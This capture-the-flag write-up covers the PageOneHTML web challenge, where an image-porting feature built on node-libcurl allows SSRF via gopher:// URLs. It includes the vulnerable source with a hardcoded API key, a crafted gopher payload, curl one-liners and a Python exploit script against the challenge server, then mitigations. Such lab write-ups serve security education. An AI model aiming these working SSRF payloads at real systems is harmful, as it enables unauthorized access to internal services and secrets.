Amazon AppSec CTF: PageOneHTML

Executive Summary

  • Challenge: PageOneHTML
  • Category: Web Security
  • Vulnerability: Server-Side Request Forgery (SSRF) via gopher:// protocol
  • Impact: Access to internal API endpoint leading to flag disclosure
  • Flags:
    • Local: HTB{f4k3_fl4g_f0r_t3st1ng}
    • Remote: HTB{l1bcurL_pla7h0r4_0f_pr0tocOl5}

Source-to-Sink Analysis

1. Entry Point - User Input (Source)

The vulnerability starts at /api/convert endpoint which accepts user-controlled markdown content:

// routes/index.js:15-28
router.post('/api/convert', async (req, res) => {
    const { markdown_content, port_images } = req.body;  // User input

    if (markdown_content) {
        html = MDHelper.makeHtml(markdown_content);      // Convert MD to HTML
        if (port_images) {                               // If port_images is true
            return ImageConverter.PortImages(html)       // Process images
                .then(newHTML => res.json({ content: newHTML }))
                .catch(() => res.json({ content: html }));
        }
        return res.json({ content: html });
    }
    return res.status(403).send(response('Missing parameters!'));
});

2. Image Processing - Protocol Confusion

The ImageConverter extracts all <img> tags and processes their src attributes:

// helpers/ImageConverter.js:5-28
module.exports = {
    PortImages(html) {
        return new Promise(async (resolve, reject) => {
            try {
                const $ = cheerio.load(html);
                function downloader(el) {
                    imgSrc = $(el).attr('src');  // Extract src attribute
                    return Promise.resolve(ImageDownloader.downloadImage(imgSrc));
                }
                Promise.all(
                    $('img')
                    .map(async (i, el) => {
                        newSrc = await downloader(el);  // Download and convert
                        $(el).attr('src', newSrc)       // Replace with data URI
                    })
                    .get()
                ).then(() => {
                    return resolve($.html());
                })
            } catch (e) {
                console.log(e);
                reject(e);
            }
        });
    }
};

3. The Vulnerable Sink - libcurl Protocol Support

The critical vulnerability lies in ImageDownloader.js using node-libcurl without protocol validation:

// helpers/ImageDownloader.js:29-49
module.exports = {
    async downloadImage(url) {
        return new Promise(async (resolve, reject) => {
            curly.get(url)  // VULNERABILITY: Accepts any protocol supported by libcurl
                .then(resp => {
                    buffer = Buffer.from(resp.data,'utf8')
                    if (isPng(buffer))
                        dataUri = "data:image/png;base64,";
                    else if (isJpg(buffer))
                        dataUri = "data:image/jpg;base64,";
                    else
                        dataUri = "data:image/svg+xml;base64";  // Non-images treated as SVG
                    return resolve(`${dataUri} ${buffer.toString('base64')}`);  // Leak response
                })
                .catch(e => {
                    console.log(e)
                    return resolve(url);
                })
        });
    }
};

Key vulnerabilities:

  1. curly.get(url) accepts ANY protocol supported by libcurl (http, https, ftp, gopher, dict, file, etc.)
  2. Non-image responses are base64-encoded and returned, leaking their content
  3. No URL validation or protocol allowlisting

4. The Target - Internal API Endpoint

The internal /api/dev endpoint is protected only by IP and API key:

// routes/index.js:30-38
router.get('/api/dev', async (req, res) => {
    // Only allow requests from localhost
    if (req.ip != '127.0.0.1') return res.status(403).send(response('Access denied!'));

    if (req.headers["x-api-key"] == "934caf984a4ca94817ea6d87d37af4b3") {
        return res.send(execSync('./flagreader.bin').toString());  // Flag!
    }
    return res.status(403).send(response('missing apikey!'));
});

Exploit Chain

Exploit Flow Diagram

Exploit Flow Diagram

Payload Construction

Step 1: Craft the Raw HTTP Request

We need to send this HTTP request to the internal endpoint:

GET /api/dev HTTP/1.1
Host: 127.0.0.1
x-api-key: 934caf984a4ca94817ea6d87d37af4b3
Connection: close

Step 2: Convert to Gopher URL

The gopher protocol format: gopher://host:port/_<data>

  • URL-encode spaces as %20
  • URL-encode CRLF as %0D%0A
  • Prefix the data with _
gopher://127.0.0.1:1337/_GET%20/api/dev%20HTTP/1.1%0D%0AHost:%20127.0.0.1%0D%0Ax-api-key:%20934caf984a4ca94817ea6d87d37af4b3%0D%0AConnection:%20close%0D%0A%0D%0A

Step 3: Embed in HTML Image Tag

<img src="gopher://127.0.0.1:1337/_GET%20/api/dev%20HTTP/1.1%0D%0AHost:%20127.0.0.1%0D%0Ax-api-key:%20934caf984a4ca94817ea6d87d37af4b3%0D%0AConnection:%20close%0D%0A%0D%0A">

Exploitation

Local Testing (Docker Container)

  1. Send the exploit payload:
curl -s http://127.0.0.1:1337/api/convert \
  -H 'Content-Type: application/json' \
  --data-binary '{
    "markdown_content": "<img src=\"gopher://127.0.0.1:1337/_GET%20/api/dev%20HTTP/1.1%0D%0AHost:%20127.0.0.1%0D%0Ax-api-key:%20934caf984a4ca94817ea6d87d37af4b3%0D%0AConnection:%20close%0D%0A%0D%0A\">",
    "port_images": true
  }'
  1. Extract and decode the base64 response:
curl -s http://127.0.0.1:1337/api/convert \
  -H 'Content-Type: application/json' \
  --data-binary '{"markdown_content":"<img src=\"gopher://127.0.0.1:1337/_GET%20/api/dev%20HTTP/1.1%0D%0AHost:%20127.0.0.1%0D%0Ax-api-key:%20934caf984a4ca94817ea6d87d37af4b3%0D%0AConnection:%20close%0D%0A%0D%0A\">","port_images":true}' \
  | jq -r .content \
  | sed -n 's/.*base64 \(.*\)".*/\1/p' \
  | tr -d '\n' \
  | base64 -d

Local Output:

HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: text/html; charset=utf-8
Content-Length: 27
Date: Thu, 11 Sep 2025 14:46:35 GMT
Connection: close

HTB{f4k3_fl4g_f0r_t3st1ng}

Remote Exploitation

Python exploit script:

import json
import re
import base64
import urllib.request

# Target URL
url = "http://94.237.53.82:31404/api/convert"

# Gopher SSRF payload
payload = {
    "markdown_content": '<img src="gopher://127.0.0.1:1337/_GET%20/api/dev%20HTTP/1.1%0D%0AHost:%20127.0.0.1%0D%0Ax-api-key:%20934caf984a4ca94817ea6d87d37af4b3%0D%0AConnection:%20close%0D%0A%0D%0A">',
    "port_images": True
}

# Send request
req = urllib.request.Request(
    url,
    data=json.dumps(payload).encode(),
    headers={"Content-Type": "application/json"}
)

# Get response
response = urllib.request.urlopen(req, timeout=15).read().decode()
obj = json.loads(response)

# Extract base64 from data URI
content = obj.get("content", "")
match = re.search(r"base64\s+([A-Za-z0-9+/=\n\r]+)", content)

if match:
    b64_data = match.group(1).replace("\n", "").replace("\r", "")
    decoded = base64.b64decode(b64_data).decode()
    print(decoded)

Remote Output:

HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: text/html; charset=utf-8
Content-Length: 35
Date: Thu, 11 Sep 2025 14:47:34 GMT
Connection: close

HTB{l1bcurL_pla7h0r4_0f_pr0tocOl5}

Root Cause Analysis

Vulnerability Chain

Vulnerability Chain

Security Issues Identified

  1. Protocol Confusion - node-libcurl accepts all protocols without validation
  2. SSRF - No egress filtering or destination validation
  3. Response Leakage - Non-image content encoded and returned
  4. Weak Access Control - Internal endpoint relies on source IP only
  5. Static Credentials - Hardcoded API key in source code

Mitigation Recommendations

1. Protocol Allowlisting

// Example fix for ImageDownloader.js
const ALLOWED_PROTOCOLS = ['http:', 'https:'];

async downloadImage(url) {
    const parsedUrl = new URL(url);
    if (!ALLOWED_PROTOCOLS.includes(parsedUrl.protocol)) {
        throw new Error('Invalid protocol');
    }
    // ... rest of the code
}

2. SSRF Protection

// Block internal networks
const BLOCKED_IPS = [
    '127.0.0.0/8',      // Loopback
    '10.0.0.0/8',       // Private network
    '172.16.0.0/12',    // Private network
    '192.168.0.0/16',   // Private network
    '169.254.0.0/16',   // Link-local
    'fd00::/8',         // IPv6 private
    '::1/128'           // IPv6 loopback
];

function isInternalIP(hostname) {
    // Implement IP range checking
    // DNS resolution and validation
}

3. Content Type Validation

// Strict image validation
async downloadImage(url) {
    const response = await fetch(url);
    const contentType = response.headers.get('content-type');

    if (!contentType?.startsWith('image/')) {
        throw new Error('Not an image');
    }

    const buffer = await response.buffer();
    if (!isPng(buffer) && !isJpg(buffer) && !isSvg(buffer)) {
        throw new Error('Invalid image format');
    }
    // ... process valid image
}

4. Remove Internal Debug Endpoints

  • Remove /api/dev endpoint in production
  • Use proper authentication mechanisms (OAuth, JWT)
  • Implement rate limiting and monitoring

Timeline

  1. Initial Analysis - Code review reveals SSRF vector via node-libcurl
  2. Protocol Testing - Confirmed gopher:// protocol support
  3. Payload Development - Crafted gopher URL with HTTP request
  4. Local Exploitation - Retrieved test flag from Docker environment
  5. Remote Exploitation - Successfully extracted production flag

Lessons Learned

  1. Never trust user input - All URLs should be validated
  2. Principle of least privilege - Use minimal protocol support
  3. Defense in depth - Multiple security layers needed
  4. Secure defaults - Libraries should be configured securely
  5. Regular security audits - Third-party dependencies need review

References